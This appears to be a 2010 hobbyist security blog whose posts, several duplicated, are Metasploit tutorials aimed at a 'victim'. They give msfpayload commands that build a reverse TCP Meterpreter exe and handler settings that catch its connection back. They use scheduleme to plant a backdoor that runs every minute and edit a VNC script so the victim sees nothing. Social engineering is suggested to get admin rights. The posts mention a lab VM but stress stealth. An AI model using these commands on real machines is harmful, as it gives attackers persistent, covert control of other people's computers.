Just comment after this on what topics you would like me to cover.....
Look forward to some comments :)
Search Adsense
Custom Search
Monday 29 November 2010
Sunday 28 November 2010
HOW TO: Metasploit Meterpreter as a Backdoor
This tutorial is for making a backdoor one the victims system which we can use to reconnect to them if we wish to.
For this we will be using the Scheduleme command but for this to work properly on windows vista and windows 7 the victim would have to open the exe as administrator. This is easy to ensure if you apply the correct social engineering.
The meterpreter session will run as the user id of the currect user. Then use the "use privs" command to get better privliages and more options then by typing "help" will list most of the avalible commands for you to use.
The "use privs" command might have been taken out in the new versions of metasploit instead i think it loads it automatically just try it out, and ill get back to you on this.
Using scheduleme command
running the below command will show you all the options avalible
>"run scheduleme -h"
The command i use is below
>"run scheduleme -m -1 -u -e /root/exploit.exe
Break down the command:
the -m options specifies how often the schedeld task will run so i did "-m -1" so every 1 mins it is started.
the -u starts the user name of the account with admin privs
the - e is the exe you want to upload to the victim which you want to use for you back door so mine is in root directory so -e /root/exploit.exe would be my option
Now its been uploaded exit meterpreter session and start the listener again and wait for a min for a connection ...watch video!
NOTE: The EXE which is uploaded must obviously configured to connect back to you and u create this exe just alike all the others.
Saturday 27 November 2010
How To Get a VNC Session Inside a Meterpreter Session While Still Having Access To The Meterpreter Command Line
If you didn't no what VNC was then its remote control software which lets you see and interact with desktop applications across any network.
In metasploit there is a .rb script that allows you to control a remote computer like VNC and its located at /opt/metasploit3/msf3/scripts/meterpreter/ and called vnc.rb this script is all well and good but it just creates a VNC session and that's it. It doesnt give you the option to carry on using Meterpreter so I came accross a script which will allow you to still use meterpreter in the background which is useful when you still what to do background operations like uploading and downloading and edits to the registry etc..
In the video:
I explain how to create the script and use it.
You can download the script from HERE its in .txt format
Then using nano which is a console based text editor installed in backtrack I create the scripts into the /opt/metasploit3/msf3/scripts/meterpreter/ location and give them the file extension .rb which is a ruby file.
Watch Video If Unsure!!!.
But there is a problem with this script if you want to be more hidden. The script spawns a Command shell prompt on the victims screen in plane site. to get around this I modify the file to include this line:
mul.datastore['DisableCourtesyShell'] = true
Watch the video as to where to place it in the file.
To run the script from meterpreter just type "run <filename.rb>" then a vnc screen has been created and you can control the remote machine but also if you go back to you meterpreter session and hit enter a few times you will still have you command line with full access :)
This is a great book for learning the Metasploit framewaork!
Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research
In metasploit there is a .rb script that allows you to control a remote computer like VNC and its located at /opt/metasploit3/msf3/scripts/meterpreter/ and called vnc.rb this script is all well and good but it just creates a VNC session and that's it. It doesnt give you the option to carry on using Meterpreter so I came accross a script which will allow you to still use meterpreter in the background which is useful when you still what to do background operations like uploading and downloading and edits to the registry etc..
In the video:
I explain how to create the script and use it.
You can download the script from HERE its in .txt format
Then using nano which is a console based text editor installed in backtrack I create the scripts into the /opt/metasploit3/msf3/scripts/meterpreter/ location and give them the file extension .rb which is a ruby file.
Watch Video If Unsure!!!.
But there is a problem with this script if you want to be more hidden. The script spawns a Command shell prompt on the victims screen in plane site. to get around this I modify the file to include this line:
mul.datastore['DisableCourtesyShell'] = true
Watch the video as to where to place it in the file.
To run the script from meterpreter just type "run <filename.rb>" then a vnc screen has been created and you can control the remote machine but also if you go back to you meterpreter session and hit enter a few times you will still have you command line with full access :)
This is a great book for learning the Metasploit framewaork!
Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research
Intro: Metasploit Meterpreter Reverse TCP Payload exe at First Glance
In this video I show you how to make a basic reverse TCP payload in Metasploits Meterpreter Program.
A bit of info on The Metasploit Project:
"Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project."
http://www.metasploit.com/
This program is avalible for Windows and Linux (I tried using it on windows and hated it) and is updated about daily.
Its one of the best, free programs for pentesting/exploiting.
In the video i show you how to use the program in Linux if you use it in Windows the commands could be slightly different.
In the video:
I show you how to make a basic Reverse_tcp payload. Open the client and use this code " ./msfpayload windows/meterpreter/reverse_tcp LHOST=<your ip adddress> LPORT=<Your Listening Port> x > /root/<filename.exe>
Explanation:
LHOST is the address of which you what you exe to connect back on to you this can be internal or external ip. To find you internal ip in Linux just open terminal and type "ifconfig" and you shall see it.
LPORT is the port you what your exe to connect back to you on so make sure its forwarded properly.
the line " x > /root/<filename.exe> " is basically saying create an exe " x " and to send it to " > /root/filename.exe " which is your root folder on Linux. This file exe will only work for windows there are the same exploits for other OS but as windows is most common I will use this.
so an example would be this
" ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 x > /root/reverse_tcp.exe "
There are extra commands which will encode your exe as to help bypass AV (AntiVirus) but I will cover them on a later post as this is intended for the very basic, first glance look at it and how it works.
Next copy the exe you just created to the (victim BOX), if you havent noticed I use a Virtual Machine running Backtrack 4 and XP Pro.
So now we need to open a listener so we can listen for the exe connecting back so that we get a session.
Open Metasploit Console and type this:
"use multi/handler"
"set PAYLOAD windows/meterpreter/reverse_tcp"
"set LHOST 192.168.1.1"
"set LPORT 4444"
"exploit"
Remember to make LHOST and LPORT your own configuration.
When the exe is clicked and activated you should get the connection and look like this:
Now we have a meterpreter session and have full access :)
A bit of info on The Metasploit Project:
"Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project."
http://www.metasploit.com/
This program is avalible for Windows and Linux (I tried using it on windows and hated it) and is updated about daily.
Its one of the best, free programs for pentesting/exploiting.
In the video i show you how to use the program in Linux if you use it in Windows the commands could be slightly different.
In the video:
I show you how to make a basic Reverse_tcp payload. Open the client and use this code " ./msfpayload windows/meterpreter/reverse_tcp LHOST=<your ip adddress> LPORT=<Your Listening Port> x > /root/<filename.exe>
Explanation:
LHOST is the address of which you what you exe to connect back on to you this can be internal or external ip. To find you internal ip in Linux just open terminal and type "ifconfig" and you shall see it.
LPORT is the port you what your exe to connect back to you on so make sure its forwarded properly.
the line " x > /root/<filename.exe> " is basically saying create an exe " x " and to send it to " > /root/filename.exe " which is your root folder on Linux. This file exe will only work for windows there are the same exploits for other OS but as windows is most common I will use this.
so an example would be this
" ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 x > /root/reverse_tcp.exe "
There are extra commands which will encode your exe as to help bypass AV (AntiVirus) but I will cover them on a later post as this is intended for the very basic, first glance look at it and how it works.
Next copy the exe you just created to the (victim BOX), if you havent noticed I use a Virtual Machine running Backtrack 4 and XP Pro.
So now we need to open a listener so we can listen for the exe connecting back so that we get a session.
Open Metasploit Console and type this:
"use multi/handler"
"set PAYLOAD windows/meterpreter/reverse_tcp"
"set LHOST 192.168.1.1"
"set LPORT 4444"
"exploit"
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...So now we have a Listening server running, waiting for the connect back.Remember to make LHOST and LPORT your own configuration.
When the exe is clicked and activated you should get the connection and look like this:
msf exploit(handler) > exploit [*] Started reverse handler on port 4444 [*] Starting the payload handler... [*] Sending stage (72346 bytes) [*] Sleeping before handling stage... [*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060) meterpreter >
Now we have a meterpreter session and have full access :)
New Security Blog!!
Because of good amounts of interest on my YouTube videos I have decided to create a blog to help explain my videos which will help you the view. As well as just posting my videos here i will also be giving you extra security updates and tips.
This is also be a place where you can ask questions etc.... I will keep this blog updated regularly and I will respond as quick as possible.
Oh and please tell me what you think to the blog ..............if im missing anything or you want to suggest something that might improve it or something then please feel free.
This is also be a place where you can ask questions etc.... I will keep this blog updated regularly and I will respond as quick as possible.
Oh and please tell me what you think to the blog ..............if im missing anything or you want to suggest something that might improve it or something then please feel free.
Subscribe to:
Posts (Atom)